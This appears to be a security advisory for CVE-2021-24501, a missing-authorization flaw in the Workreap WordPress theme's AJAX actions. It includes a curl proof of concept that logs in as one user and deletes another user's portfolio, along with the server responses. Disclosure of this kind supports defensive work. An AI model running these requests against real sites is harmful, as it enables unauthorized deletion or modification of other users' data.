Workreap < 2.2.2 – Missing Authorization Checks in Ajax Actions | CVE 2021-24501

Description

The theme had several AJAX actions missing authorization checks to verify that a user was authorized to perform critical operations such as modifying or deleting objects. This allowed a logged in user to modify or delete objects belonging to other users on the site.

Proof of Concept

# log in as arbitrary freelancer
curl -c .cookies -F action=workreap_ajax_login -F username=balle -F password=hunter2 \
  http://localhost:8888/wp-admin/admin-ajax.php
{"job":"no","type":"success","role_type":"freelancers","redirect":"http:\/\/localhost:8888\/dashboard\/?ref=profile&mode=settings&identity=3","url":"http:\/\/localhost:8888\/","loggedin":true,"message":"Successfully Logged in"}%                                                                                                      haraldei@stigmata% ./poc/poc-05-portfolio-remove.sh 1364

# delete arbitrary portfolio
curl -s -b .cookies -F action=workreap_portfolio_remove -F id=1361 \
  http://localhost:8888/wp-admin/admin-ajax.php
{"type":"success","message":"Portfolio removed successfully."}